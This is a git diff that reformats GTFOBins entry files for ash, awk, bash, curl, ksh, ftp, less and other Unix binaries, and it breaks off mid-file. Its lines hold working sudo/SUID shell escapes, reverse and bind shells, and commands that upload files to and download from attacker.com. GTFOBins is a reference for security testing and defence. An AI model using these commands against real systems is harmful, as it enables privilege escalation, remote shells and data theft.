diff --git a/_gtfobins/ash.md b/_gtfobins/ash.md index eb597b6..0656272 100644 --- a/_gtfobins/ash.md +++ b/_gtfobins/ash.md @@ -1,13 +1,13 @@ --- functions: execute-interactive: - - code: ash - sudo-enabled: - - code: sudo ash - suid-enabled: - - code: ./ash + - code: ash file-write: - - code: | - export LFILE=file_to_write - ash -c 'echo data > $LFILE' + - code: | + export LFILE=file_to_write + ash -c 'echo data > $LFILE' + suid-enabled: + - code: "./ash" + sudo-enabled: + - code: sudo ash --- diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md index 6782a72..90da062 100644 --- a/_gtfobins/awk.md +++ b/_gtfobins/awk.md @@ -1,34 +1,34 @@ --- functions: execute-interactive: - - code: awk 'BEGIN {system("/bin/sh")}' - sudo-enabled: - - code: sudo awk 'BEGIN {system("/bin/sh")}' - suid-limited: - - code: ./awk 'BEGIN {system("/bin/sh")}' + - code: awk 'BEGIN {system("/bin/sh")}' reverse-shell-non-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - RHOST=attacker.com - RPORT=12345 - awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN { - s = "/inet/tcp/0/" RHOST "/" RPORT; - while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; - while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + RHOST=attacker.com + RPORT=12345 + awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN { + s = "/inet/tcp/0/" RHOST "/" RPORT; + while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; + while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' bind-shell-non-interactive: - - description: Run `nc target.com 12345` on the attacker box to connect to the shell. - code: | - LPORT=12345 - awk -v LPORT=$LPORT 'BEGIN { - s = "/inet/tcp/" LPORT "/0/0"; - while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; - while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' - file-read: - - code: | - LFILE=file_to_read - awk '//' "$LFILE" + - description: Run `nc target.com 12345` on the attacker box to connect to the shell. + code: | + LPORT=12345 + awk -v LPORT=$LPORT 'BEGIN { + s = "/inet/tcp/" LPORT "/0/0"; + while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; + while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' file-write: - - code: | - LFILE=file_to_write - awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }' + - code: | + LFILE=file_to_write + awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }' + file-read: + - code: | + LFILE=file_to_read + awk '//' "$LFILE" + sudo-enabled: + - code: sudo awk 'BEGIN {system("/bin/sh")}' + suid-limited: + - code: ./awk 'BEGIN {system("/bin/sh")}' --- diff --git a/_gtfobins/base64.md b/_gtfobins/base64.md index 2dd7844..76f8551 100644 --- a/_gtfobins/base64.md +++ b/_gtfobins/base64.md @@ -1,15 +1,15 @@ --- functions: - sudo-enabled: - - code: | - LFILE=file_to_read - sudo base64 "$LFILE" | base64 --decode - suid-enabled: - - code: | - LFILE=file_to_read - ./base64 "$LFILE" | base64 --decode file-read: - - code: | - LFILE=file_to_read - base64 "$LFILE" | base64 --decode + - code: | + LFILE=file_to_read + base64 "$LFILE" | base64 --decode + suid-enabled: + - code: | + LFILE=file_to_read + ./base64 "$LFILE" | base64 --decode + sudo-enabled: + - code: | + LFILE=file_to_read + sudo base64 "$LFILE" | base64 --decode --- diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md index 0b67c26..5665958 100644 --- a/_gtfobins/bash.md +++ b/_gtfobins/bash.md @@ -1,52 +1,55 @@ --- functions: execute-interactive: - - code: bash - sudo-enabled: - - code: sudo bash - suid-enabled: - - code: ./bash -p - upload: - - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file. - code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_send - bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT' - - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. - code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_send - bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT' - download: - - description: Fetch a remote file via HTTP GET request. - code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_get - bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \ - 3<>/dev/tcp/$RHOST/$RPORT \ - | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' - - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. - code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_get - bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE' + - code: bash reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1' - file-read: - - description: It trims trailing newlines and it's not binary-safe. - code: | - export LFILE=file_to_read - bash -c 'echo "$(<$LFILE)"' + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1' + upload: + - description: Send local file in the body of an HTTP POST request. Run an HTTP + service on the attacker box to collect the file. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_send + bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT' + - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` + on the attacker box to collect the file. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_send + bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT' + download: + - description: Fetch a remote file via HTTP GET request. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_get + bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \ + 3<>/dev/tcp/$RHOST/$RPORT \ + | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' + - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` + on the attacker box to send the file. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_get + bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE' file-write: - - code: | - export LFILE=file_to_write - bash -c 'echo data > $LFILE' + - code: | + export LFILE=file_to_write + bash -c 'echo data > $LFILE' + file-read: + - description: It trims trailing newlines and it's not binary-safe. + code: | + export LFILE=file_to_read + bash -c 'echo "$(<$LFILE)"' + suid-enabled: + - code: "./bash -p" + sudo-enabled: + - code: sudo bash --- diff --git a/_gtfobins/busybox.md b/_gtfobins/busybox.md index c1eac8f..7e387bb 100644 --- a/_gtfobins/busybox.md +++ b/_gtfobins/busybox.md @@ -4,23 +4,24 @@ description: | what GTFBins binaries are supported. Here some example. functions: execute-interactive: - - code: busybox sh - sudo-enabled: - - code: sudo busybox sh - suid-enabled: - - description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration. - code: ./busybox sh - file-read: - - code: | - LFILE=file_to_read - ./busybox cat "$LFILE" - file-write: - - code: | - LFILE=file_to_write - busybox sh -c 'echo "data" > $LFILE' + - code: busybox sh upload: - - description: Serve files in the local folder running an HTTP server. - code: | - export LPORT=12345 - busybox httpd -f -p $LPORT -h . + - description: Serve files in the local folder running an HTTP server. + code: | + export LPORT=12345 + busybox httpd -f -p $LPORT -h . + file-write: + - code: | + LFILE=file_to_write + busybox sh -c 'echo "data" > $LFILE' + file-read: + - code: | + LFILE=file_to_read + ./busybox cat "$LFILE" + suid-enabled: + - description: It may drop the SUID privileges depending on the compilation flags + and the runtime configuration. + code: "./busybox sh" + sudo-enabled: + - code: sudo busybox sh --- diff --git a/_gtfobins/cat.md b/_gtfobins/cat.md index da1e242..0278a57 100644 --- a/_gtfobins/cat.md +++ b/_gtfobins/cat.md @@ -1,15 +1,15 @@ --- functions: - sudo-enabled: - - code: | - LFILE=file_to_read - sudo cat "$LFILE" - suid-enabled: - - code: | - LFILE=file_to_read - ./cat "$LFILE" file-read: - - code: | - LFILE=file_to_read - cat "$LFILE" + - code: | + LFILE=file_to_read + cat "$LFILE" + suid-enabled: + - code: | + LFILE=file_to_read + ./cat "$LFILE" + sudo-enabled: + - code: | + LFILE=file_to_read + sudo cat "$LFILE" --- diff --git a/_gtfobins/csh.md b/_gtfobins/csh.md index aa5b1e3..e37cb53 100644 --- a/_gtfobins/csh.md +++ b/_gtfobins/csh.md @@ -1,13 +1,13 @@ --- functions: execute-interactive: - - code: csh - sudo-enabled: - - code: sudo csh - suid-enabled: - - code: ./csh -b + - code: csh file-write: - - code: | - export LFILE=file_to_write - ash -c 'echo data > $LFILE' + - code: | + export LFILE=file_to_write + ash -c 'echo data > $LFILE' + suid-enabled: + - code: "./csh -b" + sudo-enabled: + - code: sudo csh --- diff --git a/_gtfobins/curl.md b/_gtfobins/curl.md index c14cc1b..3ad8be7 100644 --- a/_gtfobins/curl.md +++ b/_gtfobins/curl.md @@ -1,20 +1,21 @@ --- functions: upload: - - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. - code: | - URL=http://attacker.com/ - LFILE=file_to_send - curl -X POST -d @$file_to_send $URL + - description: Send local file with an HTTP POST request. Run an HTTP service on + the attacker box to collect the file. + code: | + URL=http://attacker.com/ + LFILE=file_to_send + curl -X POST -d @$file_to_send $URL download: - - description: Fetch a remote file via HTTP GET request. - code: | - URL=http://attacker.com/file_to_get - LFILE=file_to_save - curl $URL -o $LFILE + - description: Fetch a remote file via HTTP GET request. + code: | + URL=http://attacker.com/file_to_get + LFILE=file_to_save + curl $URL -o $LFILE file-read: - - description: The file path must be absolute. - code: | - LFILE=/tmp/file_to_read - curl file://$LFILE + - description: The file path must be absolute. + code: | + LFILE=/tmp/file_to_read + curl file://$LFILE --- diff --git a/_gtfobins/cut.md b/_gtfobins/cut.md index ec0bce8..8c255b9 100644 --- a/_gtfobins/cut.md +++ b/_gtfobins/cut.md @@ -1,15 +1,15 @@ --- functions: - sudo-enabled: - - code: | - LFILE=file_to_read - sudo cut -d "" -f1 "$LFILE" - suid-enabled: - - code: | - LFILE=file_to_read - ./cut -d "" -f1 "$LFILE" file-read: - - code: | - LFILE=file_to_read - cut -d "" -f1 "$LFILE" + - code: | + LFILE=file_to_read + cut -d "" -f1 "$LFILE" + suid-enabled: + - code: | + LFILE=file_to_read + ./cut -d "" -f1 "$LFILE" + sudo-enabled: + - code: | + LFILE=file_to_read + sudo cut -d "" -f1 "$LFILE" --- diff --git a/_gtfobins/dash.md b/_gtfobins/dash.md index 0e61b02..724a3dc 100644 --- a/_gtfobins/dash.md +++ b/_gtfobins/dash.md @@ -1,13 +1,13 @@ --- functions: execute-interactive: - - code: dash - sudo-enabled: - - code: sudo dash - suid-enabled: - - code: ./dash -p + - code: dash file-write: - - code: | - export LFILE=file_to_write - ash -c 'echo data > $LFILE' + - code: | + export LFILE=file_to_write + ash -c 'echo data > $LFILE' + suid-enabled: + - code: "./dash -p" + sudo-enabled: + - code: sudo dash --- diff --git a/_gtfobins/dd.md b/_gtfobins/dd.md index a34f5b7..4c8eb8d 100644 --- a/_gtfobins/dd.md +++ b/_gtfobins/dd.md @@ -1,11 +1,11 @@ --- functions: - file-read: - - code: | - LFILE=file_to_read - dd if=LFILE file-write: - - code: | - LFILE=file_to_write - echo "data" | dd of=$LFILE + - code: | + LFILE=file_to_write + echo "data" | dd of=$LFILE + file-read: + - code: | + LFILE=file_to_read + dd if=LFILE --- diff --git a/_gtfobins/diff.md b/_gtfobins/diff.md index 77ad8b6..0fc0308 100644 --- a/_gtfobins/diff.md +++ b/_gtfobins/diff.md @@ -1,15 +1,15 @@ --- functions: - sudo-enabled: - - code: | - LFILE=file_to_read - sudo diff --line-format=%L /dev/null $LFILE - suid-enabled: - - code: | - LFILE=file_to_read - ./diff --line-format=%L /dev/null $LFILE file-read: - - code: | - LFILE=file_to_read - diff --line-format=%L /dev/null $LFILE + - code: | + LFILE=file_to_read + diff --line-format=%L /dev/null $LFILE + suid-enabled: + - code: | + LFILE=file_to_read + ./diff --line-format=%L /dev/null $LFILE + sudo-enabled: + - code: | + LFILE=file_to_read + sudo diff --line-format=%L /dev/null $LFILE --- diff --git a/_gtfobins/ed.md b/_gtfobins/ed.md index 2d9dc16..9683b83 100644 --- a/_gtfobins/ed.md +++ b/_gtfobins/ed.md @@ -1,22 +1,23 @@ --- functions: execute-interactive: - - code: | - ed - !/bin/sh - sudo-enabled: - - code: | - sudo ed - !/bin/sh - suid-limited: - - code: | - ./ed - !/bin/sh - file-read: - - code: | - ed file_to_read + - code: | + ed + !/bin/sh file-write: - - code: | - ed file_to_write - w + - code: | + ed file_to_write + w + file-read: + - code: 'ed file_to_read + +' + sudo-enabled: + - code: | + sudo ed + !/bin/sh + suid-limited: + - code: | + ./ed + !/bin/sh --- diff --git a/_gtfobins/emacs.md b/_gtfobins/emacs.md index 7750506..d758d40 100644 --- a/_gtfobins/emacs.md +++ b/_gtfobins/emacs.md @@ -1,16 +1,17 @@ --- functions: execute-interactive: - - code: emacs -Q -nw --eval '(term "/bin/sh")' - sudo-enabled: - - code: sudo emacs -Q -nw --eval '(term "/bin/sh")' - suid-enabled: - - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")' - file-read: - - code: | - emacs file_to_read + - code: emacs -Q -nw --eval '(term "/bin/sh")' file-write: - - code: | - emacs file_to_write - C-x C-s + - code: | + emacs file_to_write + C-x C-s + file-read: + - code: 'emacs file_to_read + +' + suid-enabled: + - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")' + sudo-enabled: + - code: sudo emacs -Q -nw --eval '(term "/bin/sh")' --- diff --git a/_gtfobins/env.md b/_gtfobins/env.md index e0b5368..71b1e78 100644 --- a/_gtfobins/env.md +++ b/_gtfobins/env.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: env /bin/sh - sudo-enabled: - - code: sudo env /bin/sh + - code: env /bin/sh suid-enabled: - - code: ./env /bin/sh -p + - code: "./env /bin/sh -p" + sudo-enabled: + - code: sudo env /bin/sh --- diff --git a/_gtfobins/expand.md b/_gtfobins/expand.md index a13ca84..8ff7fbd 100644 --- a/_gtfobins/expand.md +++ b/_gtfobins/expand.md @@ -1,17 +1,18 @@ --- -description: | - The read file content is corrupted by replacing tabs with spaces. +description: 'The read file content is corrupted by replacing tabs with spaces. + +' functions: - sudo-enabled: - - code: | - LFILE=file_to_read - sudo expand "$LFILE" - suid-enabled: - - code: | - LFILE=file_to_read - ./expand "$LFILE" file-read: - - code: | - LFILE=file_to_read - expand "$LFILE" + - code: | + LFILE=file_to_read + expand "$LFILE" + suid-enabled: + - code: | + LFILE=file_to_read + ./expand "$LFILE" + sudo-enabled: + - code: | + LFILE=file_to_read + sudo expand "$LFILE" --- diff --git a/_gtfobins/expect.md b/_gtfobins/expect.md index 421084a..3e9602b 100644 --- a/_gtfobins/expect.md +++ b/_gtfobins/expect.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: expect -c 'spawn /bin/sh;interact' - sudo-enabled: - - code: sudo expect -c 'spawn /bin/sh;interact' + - code: expect -c 'spawn /bin/sh;interact' suid-enabled: - - code: ./expect -c 'spawn /bin/sh -p;interact' + - code: "./expect -c 'spawn /bin/sh -p;interact'" + sudo-enabled: + - code: sudo expect -c 'spawn /bin/sh;interact' --- diff --git a/_gtfobins/find.md b/_gtfobins/find.md index 2305f6b..fc1386a 100644 --- a/_gtfobins/find.md +++ b/_gtfobins/find.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: find . -exec /bin/sh \; -quit - sudo-enabled: - - code: sudo find . -exec /bin/sh \; -quit + - code: find . -exec /bin/sh \; -quit suid-enabled: - - code: ./find . -exec /bin/sh -p \; -quit + - code: "./find . -exec /bin/sh -p \\; -quit" + sudo-enabled: + - code: sudo find . -exec /bin/sh \; -quit --- diff --git a/_gtfobins/flock.md b/_gtfobins/flock.md index da940ed..28a0ec3 100644 --- a/_gtfobins/flock.md +++ b/_gtfobins/flock.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: flock -u / /bin/sh - sudo-enabled: - - code: sudo flock -u / /bin/sh + - code: flock -u / /bin/sh suid-enabled: - - code: ./flock -u / /bin/sh -p + - code: "./flock -u / /bin/sh -p" + sudo-enabled: + - code: sudo flock -u / /bin/sh --- diff --git a/_gtfobins/fmt.md b/_gtfobins/fmt.md index 028e561..79b69ac 100644 --- a/_gtfobins/fmt.md +++ b/_gtfobins/fmt.md @@ -1,17 +1,18 @@ --- -description: | - The read file content is not binary-safe. +description: 'The read file content is not binary-safe. + +' functions: - sudo-enabled: - - code: | - LFILE=file_to_read - sudo fmt -pNON_EXISTING_PREFIX "$LFILE" - suid-enabled: - - code: | - LFILE=file_to_read - ./fmt -pNON_EXISTING_PREFIX "$LFILE" file-read: - - code: | - LFILE=file_to_read - fmt -pNON_EXISTING_PREFIX "$LFILE" + - code: | + LFILE=file_to_read + fmt -pNON_EXISTING_PREFIX "$LFILE" + suid-enabled: + - code: | + LFILE=file_to_read + ./fmt -pNON_EXISTING_PREFIX "$LFILE" + sudo-enabled: + - code: | + LFILE=file_to_read + sudo fmt -pNON_EXISTING_PREFIX "$LFILE" --- diff --git a/_gtfobins/fold.md b/_gtfobins/fold.md index 275b96c..cf98e21 100644 --- a/_gtfobins/fold.md +++ b/_gtfobins/fold.md @@ -1,15 +1,15 @@ --- functions: - sudo-enabled: - - code: | - LFILE=file_to_read - sudo fold -w99999999 "$LFILE" - suid-enabled: - - code: | - LFILE=file_to_read - ./fold -w99999999 "$LFILE" file-read: - - code: | - LFILE=file_to_read - fold -w99999999 "$LFILE" + - code: | + LFILE=file_to_read + fold -w99999999 "$LFILE" + suid-enabled: + - code: | + LFILE=file_to_read + ./fold -w99999999 "$LFILE" + sudo-enabled: + - code: | + LFILE=file_to_read + sudo fold -w99999999 "$LFILE" --- diff --git a/_gtfobins/ftp.md b/_gtfobins/ftp.md index c8647d6..c80f99a 100644 --- a/_gtfobins/ftp.md +++ b/_gtfobins/ftp.md @@ -1,23 +1,23 @@ --- functions: execute-interactive: - - code: | - ftp - !/bin/sh - sudo-enabled: - - code: | - sudo ftp - !/bin/sh + - code: | + ftp + !/bin/sh upload: - - description: Send local file to a FTP server. - code: | - RHOST=attacker.com - ftp $RHOST - put file_to_send + - description: Send local file to a FTP server. + code: | + RHOST=attacker.com + ftp $RHOST + put file_to_send download: - - description: Fetch a remote file from a FTP server. - code: | - RHOST=attacker.com - ftp $RHOST - get file_to_get + - description: Fetch a remote file from a FTP server. + code: | + RHOST=attacker.com + ftp $RHOST + get file_to_get + sudo-enabled: + - code: | + sudo ftp + !/bin/sh --- diff --git a/_gtfobins/gdb.md b/_gtfobins/gdb.md index d8f60b9..413739b 100644 --- a/_gtfobins/gdb.md +++ b/_gtfobins/gdb.md @@ -7,11 +7,11 @@ description: | [version 3](/gtfobins/python3/). functions: execute-interactive: - - code: gdb -nx -ex '!sh' -ex quit - sudo-enabled: - - code: sudo gdb -nx -ex '!sh' -ex quit + - code: gdb -nx -ex '!sh' -ex quit file-write: - - code: | - LFILE=file_to_write - gdb -nx -ex "dump value $LFILE \"data\"" -ex quit + - code: | + LFILE=file_to_write + gdb -nx -ex "dump value $LFILE \"data\"" -ex quit + sudo-enabled: + - code: sudo gdb -nx -ex '!sh' -ex quit --- diff --git a/_gtfobins/head.md b/_gtfobins/head.md index e124d68..00a98a5 100644 --- a/_gtfobins/head.md +++ b/_gtfobins/head.md @@ -1,15 +1,15 @@ --- functions: - sudo-enabled: - - code: | - LFILE=file_to_read - sudo head -c1G "$LFILE" - suid-enabled: - - code: | - LFILE=file_to_read - ./head -c1G "$LFILE" file-read: - - code: | - LFILE=file_to_read - head -c1G "$LFILE" + - code: | + LFILE=file_to_read + head -c1G "$LFILE" + suid-enabled: + - code: | + LFILE=file_to_read + ./head -c1G "$LFILE" + sudo-enabled: + - code: | + LFILE=file_to_read + sudo head -c1G "$LFILE" --- diff --git a/_gtfobins/ionice.md b/_gtfobins/ionice.md index 6866485..4582300 100644 --- a/_gtfobins/ionice.md +++ b/_gtfobins/ionice.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: ionice /bin/sh - sudo-enabled: - - code: sudo ionice /bin/sh + - code: ionice /bin/sh suid-enabled: - - code: ./ionice /bin/sh -p + - code: "./ionice /bin/sh -p" + sudo-enabled: + - code: sudo ionice /bin/sh --- diff --git a/_gtfobins/jq.md b/_gtfobins/jq.md index cc22b9c..c894c84 100644 --- a/_gtfobins/jq.md +++ b/_gtfobins/jq.md @@ -1,15 +1,15 @@ --- functions: - sudo-enabled: - - code: | - LFILE=file_to_read - sudo jq -Rr . "$LFILE" - suid-enabled: - - code: | - LFILE=file_to_read - ./jq -Rr . "$LFILE" file-read: - - code: | - LFILE=file_to_read - jq -Rr . "$LFILE" + - code: | + LFILE=file_to_read + jq -Rr . "$LFILE" + suid-enabled: + - code: | + LFILE=file_to_read + ./jq -Rr . "$LFILE" + sudo-enabled: + - code: | + LFILE=file_to_read + sudo jq -Rr . "$LFILE" --- diff --git a/_gtfobins/ksh.md b/_gtfobins/ksh.md index 7386e3f..1ebc62f 100644 --- a/_gtfobins/ksh.md +++ b/_gtfobins/ksh.md @@ -1,56 +1,59 @@ --- functions: execute-interactive: - - code: ksh - sudo-enabled: - - code: sudo ksh - suid-enabled: - - code: ./ksh -p - upload: - - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file. - code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_send - ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT' - - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. - code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_send - ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT' - download: - - description: Fetch a remote file via HTTP GET request. - code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_get - ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \ - 3<>/dev/tcp/$RHOST/$RPORT \ - | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' - - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. - code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_get - ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE' + - code: ksh reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1' - file-read: - - description: It trims trailing newlines. - code: | - export LFILE=file_to_read - ksh -c 'echo "$(<$LFILE)"' - - description: It trims trailing newlines. - code: | - export LFILE=file_to_read - ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"' + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1' + upload: + - description: Send local file in the body of an HTTP POST request. Run an HTTP + service on the attacker box to collect the file. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_send + ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT' + - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` + on the attacker box to collect the file. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_send + ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT' + download: + - description: Fetch a remote file via HTTP GET request. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_get + ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \ + 3<>/dev/tcp/$RHOST/$RPORT \ + | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' + - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` + on the attacker box to send the file. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_get + ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE' file-write: - - code: | - export LFILE=file_to_write - ksh -c 'echo data > $LFILE' + - code: | + export LFILE=file_to_write + ksh -c 'echo data > $LFILE' + file-read: + - description: It trims trailing newlines. + code: | + export LFILE=file_to_read + ksh -c 'echo "$(<$LFILE)"' + - description: It trims trailing newlines. + code: | + export LFILE=file_to_read + ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"' + suid-enabled: + - code: "./ksh -p" + sudo-enabled: + - code: sudo ksh --- diff --git a/_gtfobins/ld.so.md b/_gtfobins/ld.so.md index b908a97..081ec5a 100644 --- a/_gtfobins/ld.so.md +++ b/_gtfobins/ld.so.md @@ -9,9 +9,9 @@ description: | ``` functions: execute-interactive: - - code: /lib/ld.so /bin/sh - sudo-enabled: - - code: sudo /lib/ld.so /bin/sh + - code: "/lib/ld.so /bin/sh" suid-enabled: - - code: ./ld.so /bin/sh -p + - code: "./ld.so /bin/sh -p" + sudo-enabled: + - code: sudo /lib/ld.so /bin/sh --- diff --git a/_gtfobins/less.md b/_gtfobins/less.md index f8b34ce..d6d9044 100644 --- a/_gtfobins/less.md +++ b/_gtfobins/less.md @@ -1,21 +1,22 @@ --- functions: execute-interactive: - - code: | - less /etc/profile - !/bin/sh - - code: | - VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile - v - sudo-enabled: - - code: | - sudo less /etc/profile - !/bin/sh - suid-limited: - - code: | - ./less /etc/profile - !/bin/sh + - code: | + less /etc/profile + !/bin/sh + - code: | + VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile + v file-read: - - code: | - less file_to_read + - code: 'less file_to_read + +' + sudo-enabled: + - code: | + sudo less /etc/profile + !/bin/sh + suid-limited: + - code: | + ./less /etc/profile + !/bin/sh --- diff --git a/_gtfobins/ltrace.md b/_gtfobins/ltrace.md index f7b420b..b962133 100644 --- a/_gtfobins/ltrace.md +++ b/_gtfobins/ltrace.md @@ -1,7 +1,7 @@ --- functions: execute-interactive: - - code: ltrace -b -L /bin/sh + - code: ltrace -b -L /bin/sh sudo-enabled: - - code: sudo ltrace -b -L /bin/sh + - code: sudo ltrace -b -L /bin/sh --- diff --git a/_gtfobins/mail.md b/_gtfobins/mail.md index c6f46d1..ec40e5a 100644 --- a/_gtfobins/mail.md +++ b/_gtfobins/mail.md @@ -1,17 +1,17 @@ --- functions: execute-interactive: - - description: This creates a valid Mbox file which may be required by the binary. - code: | - TF=$(mktemp) - echo "From nobody@localhost $(date)" > $TF - mail -f $TF - !/bin/sh + - description: This creates a valid Mbox file which may be required by the binary. + code: | + TF=$(mktemp) + echo "From nobody@localhost $(date)" > $TF + mail -f $TF + !/bin/sh sudo-enabled: - - description: This creates a valid Mbox file which may be required by the binary. - code: | - TF=$(mktemp) - echo "From nobody@localhost $(date)" > $TF - sudo mail -f $TF - !/bin/sh + - description: This creates a valid Mbox file which may be required by the binary. + code: | + TF=$(mktemp) + echo "From nobody@localhost $(date)" > $TF + sudo mail -f $TF + !/bin/sh --- diff --git a/_gtfobins/make.md b/_gtfobins/make.md index ec86fc7..4153bdf 100644 --- a/_gtfobins/make.md +++ b/_gtfobins/make.md @@ -5,20 +5,20 @@ description: | passing the content via stdin using `-f -`. functions: execute-interactive: - - code: | - COMMAND='/bin/sh' - make -s --eval=$'x:\n\t-'"$COMMAND" - sudo-enabled: - - code: | - COMMAND='/bin/sh' - sudo make -s --eval=$'x:\n\t-'"$COMMAND" - suid-enabled: - - code: | - COMMAND='/bin/sh -p' - ./make -s --eval=$'x:\n\t-'"$COMMAND" + - code: | + COMMAND='/bin/sh' + make -s --eval=$'x:\n\t-'"$COMMAND" file-write: - - description: Requires a newer GNU `make` version. - code: | - LFILE=file_to_write - make -s --eval="\$(file >$LFILE,data)" . + - description: Requires a newer GNU `make` version. + code: | + LFILE=file_to_write + make -s --eval="\$(file >$LFILE,data)" . + suid-enabled: + - code: | + COMMAND='/bin/sh -p' + ./make -s --eval=$'x:\n\t-'"$COMMAND" + sudo-enabled: + - code: | + COMMAND='/bin/sh' + sudo make -s --eval=$'x:\n\t-'"$COMMAND" --- diff --git a/_gtfobins/man.md b/_gtfobins/man.md index 43814c7..8ccabe2 100644 --- a/_gtfobins/man.md +++ b/_gtfobins/man.md @@ -1,18 +1,19 @@ --- functions: execute-interactive: - - code: | - man man - !/bin/sh - sudo-enabled: - - code: | - sudo man man - !/bin/sh - suid-limited: - - code: | - ./man man - !/bin/sh + - code: | + man man + !/bin/sh file-read: - - code: | - man file_to_read + - code: 'man file_to_read + +' + sudo-enabled: + - code: | + sudo man man + !/bin/sh + suid-limited: + - code: | + ./man man + !/bin/sh --- diff --git a/_gtfobins/more.md b/_gtfobins/more.md index eda72d0..823fa04 100644 --- a/_gtfobins/more.md +++ b/_gtfobins/more.md @@ 